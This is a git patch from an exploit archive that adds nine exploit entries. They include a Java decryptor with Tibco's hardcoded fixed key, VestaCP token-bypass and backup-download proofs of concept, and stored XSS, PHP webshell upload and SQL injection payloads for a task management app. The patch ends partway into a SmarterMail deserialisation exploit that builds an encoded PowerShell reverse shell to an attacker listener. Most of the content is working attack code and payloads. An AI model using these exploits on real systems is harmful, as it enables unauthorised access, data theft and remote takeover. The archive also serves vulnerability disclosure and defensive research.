From c5f0b6dbf5e349e4ad2d2c314842dde26f7d066b Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 10 Dec 2020 05:02:01 +0000
Subject: [PATCH] DB: 2020-12-10

9 changes to exploits/shellcodes

Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
SmarterMail Build 6985 - Remote Code Execution
Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)
Huawei HedEx Lite 200R006C00SPC005 - Path Traversal
VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation
VestaCP 0.9.8-26 - 'backup' Information Disclosure
Task Management System 1.0 - 'First Name and Last Name' Stored XSS
Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution
Task Management System 1.0 - 'id' SQL Injection
---
 exploits/multiple/local/49221.java  | 136 ++++++++++++
 exploits/multiple/webapps/49219.txt | 313 ++++++++++++++++++++++++++++
 exploits/multiple/webapps/49220.txt | 258 +++++++++++++++++++++++
 exploits/php/webapps/49222.txt      |  16 ++
 exploits/php/webapps/49223.txt      |  23 ++
 exploits/php/webapps/49224.txt      |  32 +++
 exploits/windows/remote/49216.py    |  56 +++++
 exploits/windows/remote/49217.py    |  67 ++++++
 exploits/windows/remote/49218.txt   | 303 +++++++++++++++++++++++++++
 files_exploits.csv                  |   9 +
 10 files changed, 1213 insertions(+)
 create mode 100644 exploits/multiple/local/49221.java
 create mode 100644 exploits/multiple/webapps/49219.txt
 create mode 100644 exploits/multiple/webapps/49220.txt
 create mode 100644 exploits/php/webapps/49222.txt
 create mode 100644 exploits/php/webapps/49223.txt
 create mode 100644 exploits/php/webapps/49224.txt
 create mode 100755 exploits/windows/remote/49216.py
 create mode 100755 exploits/windows/remote/49217.py
 create mode 100644 exploits/windows/remote/49218.txt

diff --git a/exploits/multiple/local/49221.java b/exploits/multiple/local/49221.java
new file mode 100644
index 000000000..949b25bfa
--- /dev/null
+++ b/exploits/multiple/local/49221.java
@@ -0,0 +1,136 @@
+# Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
+# Date: December 8th 2020
+# Exploit Author: Tess Sluijter
+# Vendor Homepage: https://www.tibco.com
+# Version: 5.11x and before
+# Tested on: MacOS, Linux, Windows
+
+# Tibco password decryption exploit
+
+## Background
+
+Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling:
+
+1. Using a custom key.
+2. Using a machine key.
+3. Using a fixed key.
+
+https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=2
+
+This write-up pertains to #3 above. 
+Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!. For example: "#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA".
+
+## Issues
+
+On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key. For example:
+
+* https://support.tibco.com/s/article/Tibco-KnowledgeArticle-Article-30338
+* https://community.tibco.com/questions/password-encryptiondecryption
+* https://community.tibco.com/questions/deobfuscatedecrypt-namevaluepairpassword-gv-file
+* https://community.tibco.com/questions/bw6-password-decrypt
+* http://tibcoworldin.blogspot.com/2012/08/decrypting-password-data-type-global.html
+* http://tibcoshell.blogspot.com/2016/07/how-to-decrypt-encryptedmasked-password.html
+
+## Impact
+
+Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does **not** require access to Tibco software or libraries. All you need are exfiltrated secret strings that start with the characters #!. This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software.
+
+## Instructions
+
+Compile with:
+
+javac decrypt.java
+
+Examples of running, with secrets retrieved from websites and forums:
+
+java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
+7474
+
+java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
+tibco
+
+/* comments!
+Compile with: 
+		javac decrypt.java
+		
+Run as:
+		java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
+		7474
+		
+		java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
+		tibco
+ */
+
+import java.io.ByteArrayInputStream;
+import java.util.Arrays;
+import java.util.Base64;
+import javax.crypto.Cipher;
+import javax.crypto.SecretKey;
+import javax.crypto.spec.SecretKeySpec;
+import javax.crypto.spec.IvParameterSpec;
+import javax.crypto.CipherInputStream;
+import javax.crypto.CipherOutputStream;
+
+
+class Decrypt
+{
+	public static void main (String [] arguments)
+	{
+		try
+		{
+			byte[] keyBytes = { 28, -89, -101, -111, 91, -113, 26, -70, 98, -80, -23, -53, -118, 93, -83, -17, 28, -89, -101, -111, 91, -113, 26, -70 };
+	
+			String algo = "DESede/CBC/PKCS5Padding";
+		
+			String encryptedText = arguments[0];
+			byte[] message = Base64.getDecoder().decode(encryptedText);
+
+			ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(message);
+	
+			Cipher decipher = Cipher.getInstance(algo);
+
+			int i = decipher.getBlockSize();
+			byte[] ivSetup = new byte[i];
+			byteArrayInputStream.read(ivSetup);
+
+			SecretKey key = new SecretKeySpec(keyBytes, 0, keyBytes.length, "DESede");
+	  
+			decipher.init(2, key, new IvParameterSpec(ivSetup));
+	
+			// Magic, I admit I don't understand why this is needed.
+			CipherInputStream cipherInputStream = new CipherInputStream(byteArrayInputStream, decipher);
+			char[] plaintext;
+			char[] arrayOfChar1 = new char[(message.length - i) / 2];
+			byte[] arrayOfByte4 = new byte[2];
+			byte b = 0;
+
+			while (2 == cipherInputStream.read(arrayOfByte4, 0, 2)) {
+				arrayOfChar1[b++] = (char)((char)arrayOfByte4[1] << '\b' | (char)arrayOfByte4[0]);
+			}
+			
+			cipherInputStream.close();
+  
+			if (b == arrayOfChar1.length) {
+				plaintext = arrayOfChar1;
+			} else {
+				char[] arrayOfChar = new char[b];
+				System.arraycopy(arrayOfChar1, 0, arrayOfChar, 0, b);
+				for (b = 0; b < arrayOfChar1.length; b++) {
+				arrayOfChar1[b] = Character.MIN_VALUE;
+				}
+
+				plaintext = arrayOfChar;
+				// End of Magic
+			} 
+  
+			System.out.println(plaintext);
+
+		}
+
+		catch (Exception ex)
+		{
+			System.out.println("Barf...");
+			System.out.println(ex);
+		}
+	}
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49219.txt b/exploits/multiple/webapps/49219.txt
new file mode 100644
index 000000000..4276cdfa2
--- /dev/null
+++ b/exploits/multiple/webapps/49219.txt
@@ -0,0 +1,313 @@
+# Exploit Title: VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation
+# Date: 2020-11-26
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://vestacp.com/
+# Software Link: https://vestacp.com/install/
+# Version: 0.9.8-26
+
+Document Title:
+===============
+VestaCP v0.9.8-26 - (LoginAs) Token Session Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2240
+
+
+Release Date:
+=============
+2020-11-26
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2240
+
+
+Common Vulnerability Scoring System:
+====================================
+8.3
+
+
+Vulnerability Class:
+====================
+Insufficient Session Validation
+
+
+Current Estimated Price:
+========================
+2.000€ - 3.000€
+
+
+Product & Service Introduction:
+===============================
+Web interface is open source php and javascript interface based on Vesta
+open API, it uses 381 vesta CLI calls.
+The GNU General Public Licence is a free, copyleft licence for software
+and other kinds of works. Its free to change,
+modify and redistribute source code.
+
+(Copy of the Homepage: https://vestacp.com/features/ &
+https://vestacp.com/install/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a
+insufficient session validation vulnerability in the VestaCP v0.9.8-26
+hosting web-application.
+
+
+Affected Product(s):
+====================
+Vesta
+Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-04: Researcher Notification & Coordination (Security Researcher)
+2020-05-05: Vendor Notification (Security Department)
+2020-05-07: Vendor Response/Feedback (Security Department)
+2020-**-**: Vendor Fix/Patch (Service Developer Team)
+2020-**-**: Security Acknowledgements (Security Department)
+2020-11-26: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Pre Auth (No Privileges or Session)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+A session token vulnerability has been discovered in the official
+VestaCP (Control Panel) v0.9.8-26 hosting web-application.
+The vulnerability allows remote attackers to gain unauthenticated or
+unauthorized access by client-side token manipulation.
+
+The token vulnerability is located in the function of the `LoginAs`
+module. Remote attackers are able to perform LoginAs requests
+without session token to preview there profiles. The attack requires
+user account privileges for manipulation of the request.
+The admin panel allows to request via token the local user accounts to
+login as via account switch. In that moment the token
+of the request can be removed to perform the same interaction with user
+privileges. Thus allows to access other account
+information without administrative permissions. The permission approval
+on login request is insufficient regarding a
+misconfiguration on the token implementation (client-side).
+
+Successful exploitation of the web vulnerability results in information
+disclosure, user or admin account compromise and
+elevation of privileges by further exploitation.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] /login/
+
+Vulnerable Parameter(s):
+[+] token
+
+Affected Parameter(s):
+[+] loginas
+
+
+Proof of Concept (PoC):
+=======================
+The token web vulnerability can be exploited by remote attackers with
+simple user privileges without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Request: Default (Download Backup)
+https://vestacp.localhost:8083/login/?loginas=user&token=f230a989082eec102ad5a3bb81fd0190
+https://vestacp.localhost:8083/login/?loginas=admin&token=f230a989082eec102ad5a3bb81fd0190
+
+
+PoC: Exploitation
+https://vestacp.localhost:8083/login/?loginas=user/.admin&token=null
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>VestaCP (Control Panel) v0.9.8-26 - LoginAs User/Admin PoC</title>
+<iframe
+src="https://vestacp.localhost:8083/login/?loginas=admin&token=null"%20>
+</body></head>
+<html>
+
+
+
+--- PoC Session Logs [GET] ---
+https://vestacp.localhost:8083/login/?loginas=[ACCOUNTNAME]&token=null
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer: https://vestacp.localhost:8083/list/user/
+Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
+__utmc=80953744;
+__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
+
+_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
+PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
+__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
+metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
+-
+GET: HTTP/1.1 302 Moved Temporarily
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Keep-Alive: timeout=120
+Location: /
+-
+https://vestacp.localhost:8083/
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: https://vestacp.localhost:8083/list/user/
+Connection: keep-alive
+Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
+__utmc=80953744;
+__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
+
+_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
+PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
+__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
+metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
+-
+GET: HTTP/1.1 302 Moved Temporarily
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Keep-Alive: timeout=120
+-
+Location: /list/user/
+https://vestacp.localhost:8083/list/user/
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: https://vestacp.localhost:8083/list/user/
+Connection: keep-alive
+Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
+__utmc=80953744;
+__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
+
+_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
+PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
+__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
+metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
+-
+GET: HTTP/1.1 200 OK
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Keep-Alive: timeout=120
+Content-Encoding: gzip
+-
+Welcome - Logged in as user admin
+
+
+Reference(s):
+https://vestacp.localhost:8083/
+https://vestacp.localhost:8083/login/
+https://vestacp.localhost:8083/login/?loginas
+https://vestacp.localhost:8083/list/user/
+
+
+Security Risk:
+==============
+The security risk of the remote session vulnerability in the vestacp
+application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49220.txt b/exploits/multiple/webapps/49220.txt
new file mode 100644
index 000000000..589b4ba3d
--- /dev/null
+++ b/exploits/multiple/webapps/49220.txt
@@ -0,0 +1,258 @@
+# Exploit Title: VestaCP 0.9.8-26 - 'backup' Information Disclosure
+# Date: 2020-11-25
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://vestacp.com/
+# Software Link: https://vestacp.com/install/
+# Version: 0.9.8-26
+
+Document Title:
+===============
+VestaCP v0.9.8-26 - Insufficient Session Validation Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2238
+
+
+Release Date:
+=============
+2020-11-25
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2238
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Vulnerability Class:
+====================
+Insufficient Session Validation
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Web interface is open source php and javascript interface based on Vesta
+open API, it uses 381 vesta CLI calls.
+The GNU General Public Licence is a free, copyleft licence for software
+and other kinds of works. Its free to change,
+modify and redistribute source code.
+
+(Copy of the Homepage: https://vestacp.com/features/ &
+https://vestacp.com/install/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a
+insufficient session validation vulnerability in the VestaCP v0.9.8-26
+hosting web-application.
+
+
+Affected Product(s):
+====================
+Vesta
+Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-04: Researcher Notification & Coordination (Security Researcher)
+2020-05-05: Vendor Notification (Security Department)
+2020-05-07: Vendor Response/Feedback (Security Department)
+2020-**-**: Vendor Fix/Patch (Service Developer Team)
+2020-**-**: Security Acknowledgements (Security Department)
+2020-11-25: Public Disclosure (Vulnerability Laboratory)
+
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+An insufficient session validation vulnerability has been discovered in
+the official VestaCP (Control Panel) v0.9.8-26 hosting web-application.
+The vulnerability allows remote attackers to gain sensitive
+web-application data or information without permission, authentication
+or authorization.
+
+The backup url includes a token parameter for the download request on
+backups. The mechanism is to secure that other users can only download the
+backup with the token to confirm the permission. The token is not
+required for the download and can be deattached in the client-side
+session request.
+The session validation of the backup download request is insufficient
+validating the request without token parameter approval. Next to that
+the backup
+uses the name of the privileges in combination with the date in a tar
+compressed folder. Thus allows a remote attacker with low user
+privileges to
+download the backup data without permission.
+
+Successful exploitation of the session web vulnerability results in
+information disclosure of the local application and dbms backup files.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] /download/backup/
+
+Vulnerable Parameter(s):
+[+] token
+
+Affected Parameter(s):
+[+] backup
+
+
+Proof of Concept (PoC):
+=======================
+The insufficient session validation vulnerability can be exploited by
+remote attackers with simple user privileges without user interaction.
+For security demonstration or to reproduce the information disclosure
+issue follow the provided information and steps below to continue.
+
+
+Request: Default (Download Backup)
+https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4
+https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4
+
+
+PoC: Exploitation
+https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar
+https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar
+https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>VestaCP (Control Panel) v0.9.8-26 - Information Disclosure
+(Backup)</title>
+<iframe
+src=https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar>
+</body></head>
+<html>
+
+
+--- PoC Session Logs [GET] ---
+https://vestacp.localhost:8083/download/backup/?backup=user.2020-**-**_00-00-17.tar
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Cookie: PHPSESSID=4neq25hga91vqrf4maktd4q073;
+-
+GET: HTTP/1.1 200 OK
+Server: nginx
+Content-Type: application/gzip
+Content-Length: 3891200
+Connection: keep-alive
+Content-Disposition: attachment; filename="user.2020-**-**_00-00-17.tar";
+Accept-Ranges: bytes
+
+
+Reference(s):
+https://vestacp.localhost:8083/
+https://vestacp.localhost:8083/download/
+https://vestacp.localhost:8083/download/backup/
+https://vestacp.localhost:8083/download/backup/?backup
+
+
+Security Risk:
+==============
+The security risk of the session validation web vulnerability in the
+vestacp web-application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/49222.txt b/exploits/php/webapps/49222.txt
new file mode 100644
index 000000000..9908c82df
--- /dev/null
+++ b/exploits/php/webapps/49222.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Task Management System 1.0 - 'First Name and Last Name' Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-08
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on the logged in username on header and select Manage Account.
+Step 3: Rename the user First Name or Last Name to "
+<script>alert(document.domain)</script> ".
+Step 4: Update Profile and this will trigger the XSS.
+Step 5: Logout and login again and the page will display the domain name.
\ No newline at end of file
diff --git a/exploits/php/webapps/49223.txt b/exploits/php/webapps/49223.txt
new file mode 100644
index 000000000..9c28e79be
--- /dev/null
+++ b/exploits/php/webapps/49223.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-08
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on the logged in username on header and select Manage Account.
+Step 3: Upload a php payload ( i used the default php webshell in
+/usr/share/webshells/php/php-reverse-shell.php) or a jpeg image embeded
+with a php payload. ("exiftool -Comment='<?php system($_GET['cmd']); ?>'
+r0b0t.jpg") Then update profile.
+Step 4: Click on username on header again and select Manage Account.
+Step 5: Right click on the uploaded php payload or embeded image located
+under the "choose avatar form" then copy image location.
+Step 6: Start nc listener and paste the url in browser. This will trigger
+the remote code execution if you used a php shell.  (
+http://localhost/assets/uploads/1607438280_shell.php )
\ No newline at end of file
diff --git a/exploits/php/webapps/49224.txt b/exploits/php/webapps/49224.txt
new file mode 100644
index 000000000..7397dd5aa
--- /dev/null
+++ b/exploits/php/webapps/49224.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Task Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-08
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Log into application with credentials
+Step 2. Click on Projects
+Step 3. Select View Projects
+Step 4. Choose any project, click on action and select view
+Step 5. Capture the request of the "page=view_project&id=" page in burpsute
+Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs "
+Step 7. This will inject successfully and you will have an information disclosure of all databases contents
+
+---
+Parameter: id (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: page=view_project&id=3 AND 5169=5169
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: page=view_project&id=3 AND (SELECT 3991 FROM (SELECT(SLEEP(5)))NOXH)
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 9 columns
+Payload: page=view_project&id=-2597 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x5a46784156705a6e654b6a454d44767155796a466f41436c6667585763424b534a4f4c4e52775a45,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL-- -
+---
\ No newline at end of file
diff --git a/exploits/windows/remote/49216.py b/exploits/windows/remote/49216.py
new file mode 100755
index 000000000..7f4d494fb
--- /dev/null
+++ b/exploits/windows/remote/49216.py
@@ -0,0 +1,56 @@
+# Exploit Title: SmarterMail Build 6985 - Remote Code Execution
+# Exploit Author: 1F98D
+# Original Author: Soroush Dalili
+# Date: 10 May 2020
+# Vendor Hompage: re
+# CVE: CVE-2019-7214
+# Tested on: Windows 10 x64
+# References:
+# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
+# 
+# SmarterMail before build 6985 provides a .NET remoting endpoint
+# which is vulnerable to a .NET deserialisation attack.
+#
+#!/usr/bin/python3
+​
+import base64
+import socket
+import sys
+from struct import pack
+​
+HOST='192.168.1.1'
+PORT=17001
+LHOST='192.168.1.2'
+LPORT=4444
+​
+psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
+psh_shell = psh_shell.encode('utf-16')[2:] # remove BOM
+psh_shell = base64.b64encode(psh_shell)
+psh_shell = psh_shell.ljust(1360, b' ')
+​
